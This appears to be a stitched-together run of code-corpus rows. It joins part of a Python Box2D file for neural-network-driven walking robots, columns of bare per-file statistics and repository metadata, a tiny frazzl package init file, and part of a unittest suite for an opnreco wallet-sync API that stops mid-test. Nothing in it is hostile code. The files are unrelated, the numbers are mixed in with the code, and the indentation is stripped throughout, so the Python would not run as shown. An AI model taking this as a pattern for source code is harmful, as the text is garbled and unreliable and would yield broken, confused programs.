joint_angles = [(j.angle%(2*pi))/pi - 1 for j in self.joints]
# Make the limbs angle list symmetric (second half *= -1)
for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
joint_angles[i] *= -1
# Add body angle sensor, range [-180, 180] maps to [-1, 1]
body_angle = ((self.bodies[0].angle + pi) % (2 * pi) - pi) / pi
self.sensors = [dpos.x, dpos.y] + joint_angles + sensors + [body_angle]
if dpos.x < 0 or mirror:
# Mirror mode
joint_angles = joint_angles[::-1]
self.sensors = [-dpos.x, dpos.y] + joint_angles + sensors[::-1] + [body_angle]
self.nn.feedforward(self.sensors)
if dpos.x < 0 or mirror:
# Mirror mode
self.joints[0].motorSpeed = -self.nn.output[3]*20
self.joints[1].motorSpeed = -self.nn.output[2]*20
self.joints[2].motorSpeed = -self.nn.output[1]*20
self.joints[3].motorSpeed = -self.nn.output[0]*20
else:
for i in range(len(self.joints)):
self.joints[i].motorSpeed = self.nn.output[i]*20
class Weakotron1001(Cubotron1001):
"""
Same as Cubotron1001 but with super weak motors
"""
def __init__(self, world):
super().__init__(world)
self.morpho = "Weakotron1001"
def init_body(self):
"""
Order of defining joints and sensors is important
self.joints must be symetrical so it can be reversed for mirror mode
Sensors number (n):
(0)-----x-----(1) [[[ BODY ]]] (2)-----x-----(3)
"""
self.bodies = []
self.body = self.world.CreateDynamicBody(position=self.start_position)
self.body.CreatePolygonFixture(box=(0.5, 0.5), density=1, friction=0.3,
userData = self,
#groupIndex = -1
)
# Ground/Body sensors
self.body.CreateCircleFixture(pos=(-0.5, 0.5), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 1)
)
self.body.CreateCircleFixture(pos=(0.5, 0.5), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 2)
)
self.bodies.append(self.body)
# Legs
self.lleg = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lleg.CreatePolygonFixture(box=(0.3, 0.15), density=1,
friction=0.3,
userData = self,
#groupIndex = -1
)
self.bodies.append(self.lleg)
self.rleg = self.world.CreateDynamicBody(position=self.start_position)
self.rleg.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3,
userData = self,
#groupIndex = -1
)
self.bodies.append(self.rleg)
# Feet
self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
self.lfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
friction=0.3,
userData = self,
#groupIndex = -1
)
## Ground/Foot sensor
self.lfoot.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 0),
#groupIndex = -1
)
self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
self.rfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
friction=0.3,
userData = self,
#groupIndex = -1
)
## Ground/Foot sensor
self.rfoot.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 3),
#groupIndex = -1
)
self.bodies.append(self.lfoot)
self.bodies.append(self.rfoot)
self.world.contactListener.registerSensors(self.id, self.n_contact_sensors)
self.joints = []
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.lleg,
bodyB = self.lfoot,
collideConnected = False,
localAnchorA = (-0.3, 0),
localAnchorB = (0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 5.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.lleg,
collideConnected = False,
localAnchorA = (-0.4, -0.45),
localAnchorB = (0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.rleg,
collideConnected = False,
localAnchorA = (0.4, -0.45),
localAnchorB = (-0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.rleg,
bodyB = self.rfoot,
collideConnected = False,
localAnchorA = (0.3, 0),
localAnchorB = (-0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 5.0
))
def update(self, sensors, mirror=False):
dpos = self.target - self.body.position
if dpos.length > 1:
dpos.Normalize()
joint_angles = [(j.angle%(2*pi))/pi - 1 for j in self.joints]
# Make the limbs angle list symmetric (second half *= -1)
for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
joint_angles[i] *= -1
# Add body angle sensor, range [-180, 180] maps to [-1, 1]
body_angle = ((self.bodies[0].angle + pi) % (2 * pi) - pi) / pi
self.sensors = [dpos.x, dpos.y] + joint_angles + sensors + [body_angle]
if dpos.x < 0 or mirror:
# Mirror mode
joint_angles = joint_angles[::-1]
self.sensors = [-dpos.x, dpos.y] + joint_angles + sensors[::-1] + [body_angle]
self.nn.feedforward(self.sensors)
if dpos.x < 0 or mirror:
# Mirror mode
self.joints[0].motorSpeed = -self.nn.output[3]*3
self.joints[1].motorSpeed = -self.nn.output[2]*3
self.joints[2].motorSpeed = -self.nn.output[1]*3
self.joints[3].motorSpeed = -self.nn.output[0]*3
else:
self.joints[0].motorSpeed = -self.nn.output[0]*3
self.joints[1].motorSpeed = -self.nn.output[1]*3
self.joints[2].motorSpeed = -self.nn.output[2]*3
self.joints[3].motorSpeed = -self.nn.output[3]*3
class Boulotron2000(Animatronic):
"""
Neural network input layer:
[pos.x] [pos.y] [joints × 6] [contact_sensors × 6] [body_angle]
Contact sensors:
- lfoot
- lheel
- lbody
- rbody
- rheel
- rfoot
Other sensors:
- body_angle
"""
def __init__(self, world):
super().__init__(world)
self.morpho = "Boulotron2000"
self.n_contact_sensors = 6
self.n_inputs = 2+6+6+1
def init_body(self):
"""
Order of defining joints and sensors is important
self.joints must be symetrical so it can be reversed for mirror mode
Sensors number (n):
(0)---X(1)-----x-----(2) [[[ BODY ]]] (3)-----x-----(4)X---(5)
"""
self.bodies = []
self.body = self.world.CreateDynamicBody(position=self.start_position)
self.body.CreateCircleFixture(pos=(0.0, 0.0), radius=0.6, density=1.0,
userData = self,)
## Ground/Body sensors
self.body.CreateCircleFixture(pos=(-0.58, -0.1), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 2))
self.body.CreateCircleFixture(pos=(0.58, -0.1), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 3))
self.bodies.append(self.body)
# Thighs
self.lthigh = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3,
userData = self,)
fixture.filterData.groupIndex = -1
self.bodies.append(self.lthigh)
self.rthigh = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.rthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3)
fixture.filterData.groupIndex = -1
self.bodies.append(self.rthigh)
# Legs
self.lleg = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lleg.CreatePolygonFixture(box=(0.36, 0.1), density=1, friction=0.3,
userData = self,)
fixture.filterData.groupIndex = -1
self.bodies.append(self.lleg)
self.rleg = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.rleg.CreatePolygonFixture(box=(0.36, 0.1), density=1, friction=0.3,
userData = self,)
fixture.filterData.groupIndex = -1
self.bodies.append(self.rleg)
## Heel sensors
self.lleg.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 1), groupIndex=-1)
self.rleg.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 4), groupIndex=-1)
# Feet
self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lfoot.CreatePolygonFixture(box=(0.2, 0.08), density=1, friction=0.3,
userData = self,)
fixture.filterData.groupIndex = -1
self.bodies.append(self.lfoot)
self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.rfoot.CreatePolygonFixture(box=(0.2, 0.08), density=1, friction=0.3,
userData = self,)
fixture.filterData.groupIndex = -1
self.bodies.append(self.rfoot)
## Feet sensors
self.lfoot.CreateCircleFixture(pos=(-0.2, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 0), groupIndex=-1)
self.rfoot.CreateCircleFixture(pos=(0.2, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 5), groupIndex=-1)
# Contact sensors
self.world.contactListener.registerSensors(self.id, self.n_contact_sensors)
self.joints = []
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.lleg,
bodyB = self.lfoot,
collideConnected = False,
localAnchorA = (-0.36, 0),
localAnchorB = (0.2, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.lthigh,
bodyB = self.lleg,
collideConnected = False,
localAnchorA = (-0.3, 0),
localAnchorB = (0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.lthigh,
collideConnected = False,
localAnchorA = (0.0, -0.55),
localAnchorB = (0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 20.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.rthigh,
collideConnected = False,
localAnchorA = (0.0, -0.55),
localAnchorB = (-0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 20.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.rthigh,
bodyB = self.rleg,
collideConnected = False,
localAnchorA = (0.3, 0),
localAnchorB = (-0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.rleg,
bodyB = self.rfoot,
collideConnected = False,
localAnchorA = (0.36, 0),
localAnchorB = (-0.2, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
def update(self, sensors, mirror=False):
dpos = self.target - self.body.position
if dpos.length > 1: # Radius of sight
dpos.Normalize()
joint_angles = [(j.angle % (2*pi)) / pi - 1 for j in self.joints]
# Make the limbs angle list symmetric (second half *= -1)
for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
joint_angles[i] *= -1
# Add body angle sensor, range [-180, 180] maps to [-1, 1]
body_angle = ((self.bodies[0].angle + pi) % (2 * pi) - pi) / pi
self.sensors = [dpos.x, dpos.y] + joint_angles + sensors + [body_angle]
if dpos.x < 0 or mirror:
# Mirror mode
self.sensors = [-dpos.x, dpos.y] + joint_angles[::-1] + sensors[::-1] + [body_angle]
# Send input to neural network
self.nn.feedforward(self.sensors)
# Read output from neural network
if dpos.x < 0 or mirror:
# Mirror mode
self.joints[0].motorSpeed = -self.nn.output[5]*5.0
self.joints[1].motorSpeed = -self.nn.output[4]*15.0
self.joints[2].motorSpeed = -self.nn.output[3]*15.0
self.joints[3].motorSpeed = -self.nn.output[2]*15.0
self.joints[4].motorSpeed = -self.nn.output[1]*15.0
self.joints[5].motorSpeed = -self.nn.output[0]*5.0
else:
self.joints[0].motorSpeed = -self.nn.output[0]*5.0
self.joints[1].motorSpeed = -self.nn.output[1]*15.0
self.joints[2].motorSpeed = -self.nn.output[2]*15.0
self.joints[3].motorSpeed = -self.nn.output[3]*15.0
self.joints[4].motorSpeed = -self.nn.output[4]*15.0
self.joints[5].motorSpeed = -self.nn.output[5]*5.0
class Boulotron2001(Animatronic):
""""
Neural network input layer:
[pos.x] [pos.y] [joints × 6] [contact_sensors × 6] [body_angle]
Contact sensors:
- lfoot
- lheel
- lbody
- rbody
- rheel
- rfoot
Other sensors:
- body_angle
"""
def __init__(self, world):
self.morpho = "Boulotron2001"
self.n_contact_sensors = 6
self.n_inputs = 2+6+6+1
super().__init__(world)
def init_body(self):
"""
Order of defining joints and sensors is important
self.joints must be symetrical so it can be reversed for mirror mode
Sensors number (n):
(0)---X(1)-----x-----(2) [[[ BODY ]]] (3)-----x-----(4)X---(5)
"""
self.bodies = []
self.body = self.world.CreateDynamicBody(position=self.start_position)
self.body.CreateCircleFixture(pos=(0.0, 0.0), radius=0.6, density=0.5,
userData = self)
self.bodies.append(self.body)
## Ground/Body sensors
self.body.CreateCircleFixture(pos=(-0.58, -0.1), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 2))
self.body.CreateCircleFixture(pos=(0.58, -0.1), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 3))
# Thighs
self.lthigh = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3,
userData = self)
fixture.filterData.groupIndex = -1
self.bodies.append(self.lthigh)
self.rthigh = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.rthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3)
fixture.filterData.groupIndex = -1
self.bodies.append(self.rthigh)
# Legs
self.lleg = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lleg.CreatePolygonFixture(box=(0.36, 0.1), density=1, friction=0.3,
userData = self)
fixture.filterData.groupIndex = -1
self.bodies.append(self.lleg)
self.rleg = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.rleg.CreatePolygonFixture(box=(0.36, 0.1), density=1, friction=0.3,
userData = self)
fixture.filterData.groupIndex = -1
self.bodies.append(self.rleg)
## Heel sensors
self.lleg.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 1), groupIndex=-1)
self.rleg.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 4), groupIndex=-1)
# Feet
self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lfoot.CreatePolygonFixture(box=(0.1, 0.08), density=1, friction=0.3,
userData = self)
fixture.filterData.groupIndex = -1
self.bodies.append(self.lfoot)
self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.rfoot.CreatePolygonFixture(box=(0.1, 0.08), density=1, friction=0.3,
userData = self)
fixture.filterData.groupIndex = -1
self.bodies.append(self.rfoot)
## Feet sensors
self.lfoot.CreateCircleFixture(pos=(-0.1, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 0), groupIndex=-1)
self.rfoot.CreateCircleFixture(pos=(0.1, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 5), groupIndex=-1)
# Contact sensors
self.world.contactListener.registerSensors(self.id, self.n_contact_sensors)
self.joints = []
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.lleg,
bodyB = self.lfoot,
collideConnected = False,
localAnchorA = (-0.36, 0),
localAnchorB = (0.2, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.lthigh,
bodyB = self.lleg,
collideConnected = False,
localAnchorA = (-0.3, 0),
localAnchorB = (0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.lthigh,
collideConnected = False,
localAnchorA = (-0.35, -0.4),
localAnchorB = (0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 20.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.rthigh,
collideConnected = False,
localAnchorA = (0.35, -0.4),
localAnchorB = (-0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 20.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.rthigh,
bodyB = self.rleg,
collideConnected = False,
localAnchorA = (0.3, 0),
localAnchorB = (-0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.rleg,
bodyB = self.rfoot,
collideConnected = False,
localAnchorA = (0.36, 0),
localAnchorB = (-0.2, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
def update(self, sensors, mirror=False):
dpos = self.target - self.body.position
if dpos.length > 1: # Radius of sight
dpos.Normalize()
joint_angles = [(j.angle%(2*pi))/pi - 1 for j in self.joints]
# Make the limbs angle list symmetric (second half *= -1)
for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
joint_angles[i] *= -1
# Add body angle sensor, range [-180, 180] maps to [-1, 1]
body_angle = ((self.bodies[0].angle + pi) % (2 * pi) - pi) / pi
if dpos.x < 0 or mirror:
# Mirror mode
self.sensors = [-dpos.x, dpos.y] + joint_angles[::-1] + sensors[::-1] + [body_angle]
else:
self.sensors = [dpos.x, dpos.y] + joint_angles + sensors + [body_angle]
# Send input to neural network
self.nn.feedforward(self.sensors)
# Read output from neural network
if dpos.x < 0 or mirror:
# Mirror mode
self.joints[0].motorSpeed = -self.nn.output[5]*2.0
self.joints[1].motorSpeed = -self.nn.output[4]*5.0
self.joints[2].motorSpeed = -self.nn.output[3]*8.0
self.joints[3].motorSpeed = -self.nn.output[2]*8.0
self.joints[4].motorSpeed = -self.nn.output[1]*5.0
self.joints[5].motorSpeed = -self.nn.output[0]*2.0
else:
self.joints[0].motorSpeed = -self.nn.output[0]*2.0
self.joints[1].motorSpeed = -self.nn.output[1]*5.0
self.joints[2].motorSpeed = -self.nn.output[2]*8.0
self.joints[3].motorSpeed = -self.nn.output[3]*8.0
self.joints[4].motorSpeed = -self.nn.output[4]*5.0
self.joints[5].motorSpeed = -self.nn.output[5]*2.0
| 39.645197
| 114
| 0.476938
| 3,675
| 36,315
| 4.668027
| 0.063673
| 0.045468
| 0.039172
| 0.053862
| 0.904576
| 0.900495
| 0.898514
| 0.898164
| 0.884115
| 0.8348
| 0
| 0.050747
| 0.412337
| 36,315
| 915
| 115
| 39.688525
| 0.752823
| 0.084786
| 0
| 0.807512
| 0
| 0
| 0.001963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034429
| false
| 0
| 0.007825
| 0
| 0.056338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c6b9af7f169658ff911cd2e7382c8e9deeaf192a
| 73
|
py
|
Python
|
frazzl/__init__.py
|
jimtheplant/qraphql-booster
|
cc905310ca19c32e8c555c54069a0ac5b127d505
|
[
"Apache-2.0"
] | 2
|
2019-11-20T16:18:53.000Z
|
2020-05-25T11:00:58.000Z
|
frazzl/__init__.py
|
jimtheplant/qraphql-booster
|
cc905310ca19c32e8c555c54069a0ac5b127d505
|
[
"Apache-2.0"
] | null | null | null |
frazzl/__init__.py
|
jimtheplant/qraphql-booster
|
cc905310ca19c32e8c555c54069a0ac5b127d505
|
[
"Apache-2.0"
] | null | null | null |
from .services import init_services
from .types import *
init_services()
| 18.25
| 35
| 0.808219
| 10
| 73
| 5.7
| 0.5
| 0.350877
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123288
| 73
| 3
| 36
| 24.333333
| 0.890625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
05f9e7c57e37300b0379535f9e6a1a468a2cb130
| 60,559
|
py
|
Python
|
backend/opnreco/api/tests/test_syncapi.py
|
OpenPaymentNetwork/opnreco
|
99c8955d7e200fe11fc23c3568879c543940b168
|
[
"MIT"
] | null | null | null |
backend/opnreco/api/tests/test_syncapi.py
|
OpenPaymentNetwork/opnreco
|
99c8955d7e200fe11fc23c3568879c543940b168
|
[
"MIT"
] | null | null | null |
backend/opnreco/api/tests/test_syncapi.py
|
OpenPaymentNetwork/opnreco
|
99c8955d7e200fe11fc23c3568879c543940b168
|
[
"MIT"
] | null | null | null |
from decimal import Decimal
from opnreco.testing import DBSessionFixture
import datetime
import os
import pyramid.testing
import responses
import unittest
zero = Decimal()
def setup_module():
global dbsession_fixture
dbsession_fixture = DBSessionFixture()
def teardown_module():
dbsession_fixture.close()
class TestSyncAPI(unittest.TestCase):
def setUp(self):
os.environ['opn_api_url'] = 'https://opn.example.com:9999'
self.config = pyramid.testing.setUp()
self.dbsession, self.close_session = dbsession_fixture.begin_session()
def tearDown(self):
self.close_session()
pyramid.testing.tearDown()
@property
def _class(self):
from ..syncapi import SyncAPI
return SyncAPI
def _make(
self,
owner_id='11',
file_type='open_circ',
auto_enable_loops=False):
from opnreco.models.db import Owner
from opnreco.models.db import File
owner = Owner(
id=owner_id,
title="Test Profile",
username='testy',
)
self.dbsession.add(owner)
self.dbsession.flush()
file = File(
id=1239,
owner_id=owner_id,
file_type=file_type,
title='Test File',
currency='USD',
has_vault=True,
auto_enable_loops=auto_enable_loops)
self.dbsession.add(file)
self.dbsession.flush()
request = pyramid.testing.DummyRequest(
dbsession=self.dbsession,
owner=owner,
personal_id='12',
access_token='example-token',
remote_addr='127.0.0.1',
user_agent='Test UA',
wallet_info={'profile': {'accounts': [{
'id': '1102',
'redacted_account_num': 'XXX45',
'rdfi_name': "Test Bank",
'alias': 'myacct',
}]}},
)
obj = self._class(request)
obj.change_log = []
return obj
@responses.activate
def test_with_no_transfers(self):
from opnreco.models import db
responses.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [],
'more': False,
'first_sync_ts': None,
'last_sync_ts': None,
})
obj = self._make()
obj()
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('11', downloads[0].owner_id)
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id)
.all())
self.assertEqual(1, len(events))
self.assertEqual('11', events[0].owner_id)
self.assertEqual('opn_sync', events[0].event_type)
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(0, len(records))
@responses.activate
def test_redeem_from_sender_perspective(self):
from opnreco.models import db
responses.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [{
'id': '500',
'workflow_type': 'redeem',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.25',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'completed',
'completed': True,
'canceled': False,
'sender_id': '11',
'sender_uid': 'wingcash:11',
'sender_info': {
'title': "Tester",
'screen_name': 'testy',
},
'recipient_id': '1102',
'recipient_uid': 'wingcash:1102',
'recipient_info': {
'title': "Acct",
'is_dfi_account': True,
},
'movements': [{
'number': 2,
'timestamp': '2018-01-02T05:06:07Z',
'action': 'deposit',
'from_id': '11',
'to_id': '1102',
'loops': [
{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
},
{
'currency': 'USD',
'loop_id': '0',
'amount': '0.25',
'issuer_id': '20',
},
],
}],
}],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
responses.add(
responses.GET,
'https://opn.example.com:9999/p/19',
json={'title': "Super Bank 19", 'username': 'bank19'})
responses.add(
responses.GET,
'https://opn.example.com:9999/p/20',
json={'title': "Super Bank 20", 'username': 'bank20'})
responses.add(
responses.GET,
'https://opn.example.com:9999/p/1102',
json={'title': "Tester's Super Bank Checking Account"})
obj = self._make()
obj()
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('11', downloads[0].owner_id)
events = self.dbsession.query(db.OwnerLog).all()
self.assertEqual([
'opn_sync',
'peer_add',
'peer_add',
'add_period_for_sync',
], [e.event_type for e in events])
event = events[0]
self.assertEqual('11', event.owner_id)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
record = records[0]
self.assertEqual('redeem', record.workflow_type)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
self.assertEqual(True, record.completed)
self.assertEqual(False, record.canceled)
self.assertEqual('11', record.sender_id)
self.assertEqual('wingcash:11', record.sender_uid)
self.assertEqual('1102', record.recipient_id)
self.assertEqual('wingcash:1102', record.recipient_uid)
peers = self.dbsession.query(db.Peer).order_by(db.Peer.peer_id).all()
self.assertEqual(2, len(peers))
self.assertEqual('11', peers[0].owner_id)
self.assertEqual('11', peers[0].peer_id)
self.assertEqual('Test Profile', peers[0].title)
self.assertEqual('testy', peers[0].username)
self.assertEqual(False, peers[0].is_dfi_account)
self.assertEqual('11', peers[1].owner_id)
self.assertEqual('1102', peers[1].peer_id)
self.assertEqual('XXX45 at Test Bank (myacct)', peers[1].title)
self.assertEqual('', peers[1].username)
self.assertEqual(True, peers[1].is_dfi_account)
periods = (self.dbsession.query(db.Period).all())
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('11', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.FileMovement, db.Movement)
.join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(2, len(movements))
fm, m = movements[0]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual(2, m.number)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('19', m.issuer_id)
self.assertEqual(datetime.datetime(2018, 1, 2, 5, 6, 7), m.ts)
self.assertEqual('1102', fm.peer_id)
self.assertEqual(Decimal('-1.00'), fm.wallet_delta)
fm, m = movements[1]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual(2, m.number)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('20', m.issuer_id)
self.assertEqual(datetime.datetime(2018, 1, 2, 5, 6, 7), m.ts)
self.assertEqual('1102', fm.peer_id)
self.assertEqual(Decimal('-0.25'), fm.wallet_delta)
events = self.dbsession.query(db.FileMovementLog).all()
self.assertEqual(2, len(events))
event = events[0]
self.assertEqual('sync_file_movements', event.event_type)
recos = self.dbsession.query(db.Reco).all()
self.assertEqual(0, len(recos))
@responses.activate
def test_redeem_from_issuer_perspective(self):
from opnreco.models import db
responses.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [{
'id': '500',
'workflow_type': 'redeem',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.00',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'completed',
'completed': True,
'canceled': False,
'sender_id': '11',
'sender_uid': 'wingcash:11',
'sender_info': {
'title': "Tester",
},
'recipient_id': '1102',
'recipient_uid': 'wingcash:1102',
'recipient_info': {
'title': "Acct",
},
'movements': [{
'number': 1,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'deposit',
'from_id': '1102',
'to_id': '19',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
}],
}],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
responses.add(
responses.GET,
'https://opn.example.com:9999/p/19',
json={'title': "Super Bank 19", 'username': 'bank19'})
obj = self._make(owner_id='19')
obj()
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('19', downloads[0].owner_id)
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id).all())
self.assertEqual(5, len(events))
event = events[0]
self.assertEqual('19', event.owner_id)
self.assertEqual('opn_sync', event.event_type)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
record = records[0]
self.assertEqual('redeem', record.workflow_type)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
self.assertEqual(True, record.completed)
self.assertEqual(False, record.canceled)
self.assertEqual('11', record.sender_id)
self.assertEqual('wingcash:11', record.sender_uid)
self.assertEqual('1102', record.recipient_id)
self.assertEqual('wingcash:1102', record.recipient_uid)
periods = (
self.dbsession.query(db.Period)
.all())
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('19', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.FileMovement, db.Movement)
.join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(1, len(movements))
fm, m = movements[0]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('1102', fm.peer_id)
